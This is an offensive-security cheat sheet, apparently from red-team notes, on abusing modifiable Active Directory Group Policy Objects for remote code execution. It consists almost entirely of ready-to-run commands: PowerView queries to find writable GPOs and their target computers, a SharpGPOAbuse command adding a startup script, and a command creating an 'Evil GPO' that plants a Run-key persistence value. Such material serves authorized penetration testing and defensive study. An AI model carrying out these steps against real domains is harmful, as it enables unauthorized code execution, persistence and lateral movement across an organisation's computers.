Introduction
A GPO (Group Policy Object) is a collection of settings that define how computers and users on a network should behave. GPOs are used to enforce security policies, configure system settings, and manage software installations across multiple computers in an organization.
If domain users can modify a GPO, it can lead to several problems like having RCE on a machine.
Modifiable GPOs
1. Enumerate modifiable GPOs
Copy Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "CreateChild|WriteProperty" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}" } 2. If there is any, resolve its GPO name and the SID of the principal.
Copy Get-DomainGPO -Identity "<ObjectDN>" | select displayName, gpcFileSysPath
ConvertFrom-SID <SecurityIdentifier> 3. Find out the OU where the GPO appears.
Copy Get-DomainOU -GPLink "{RelativeDN}" | select distinguishedName 4. Get the computer where the GPO applies.
Copy Get-DomainComputer -SearchBase "<OU_distinguishedname>" | select dnsHostName 5. Modify the GPO
Copy .\SharpGPOAbuse.exe --AddComputerScript --ScriptName startup.bat --ScriptContents "<SCRIPT_CONTENT>" --GPOName "<GPO_NAME>" 6. Wait for the GPO to take effect (20 minutes or so).
Principals with Create groupPolicyContainer objects privilege
1. Enumerate principals (Users/groups) that can create new GPOs in the domain.
Copy Get-DomainObjectAcl -Identity "CN=Policies,CN=System,DC=dev,DC=cyberbotic,DC=io" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" -and $_.ActiveDirectoryRights -contains "CreateChild" } | % { ConvertFrom-SID $_.SecurityIdentifier } 2. Look for OUs with "WriteProperty" on the attribute "GP-LINK".
3. Become the principal and create a GPO
Copy Set-GPPrefRegistryValue -Name "Evil GPO" -Context Computer -Action Create -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Updater" -Value "<COMMAND>" -Type ExpandString 